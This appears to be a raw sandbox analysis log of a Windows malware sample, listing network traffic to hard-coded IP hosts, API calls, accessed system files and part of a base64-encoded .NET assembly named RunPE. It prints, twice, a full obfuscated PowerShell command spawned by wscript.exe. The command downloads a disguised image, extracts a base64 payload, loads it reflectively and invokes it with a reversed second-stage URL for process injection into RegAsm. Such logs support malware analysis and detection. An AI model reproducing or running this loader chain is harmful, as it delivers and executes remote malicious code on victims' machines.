Data received 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
Data received BDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADIANAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAPAAKAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAFIAdQBuAFAARQAuAGQAbABsAAAALAAGAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABSAHUAbgBQAEUAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAAAwAAABAMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=<<BASE64_END>>
Data sent GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
Data sent GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 91.92.254.14
host 91.92.254.194
Time & API Arguments Status Return Repeated

WSASend

 buffer: GET /Users_API/syscore/file_fdncluho.ggk.txt HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 91.92.254.14
socket: 560
0 0
Time & API Arguments Status Return Repeated

WSASend

 buffer: GET /Users_API/syscore/file_fdncluho.ggk.txt HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 91.92.254.14
socket: 560
0 0

send

 buffer: GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
socket: 1400
sent: 83
1 83 0

send

 buffer: GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194
socket: 1400
sent: 59
1 59 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')"
parent_process wscript.exe martian_process powershell -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')"
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe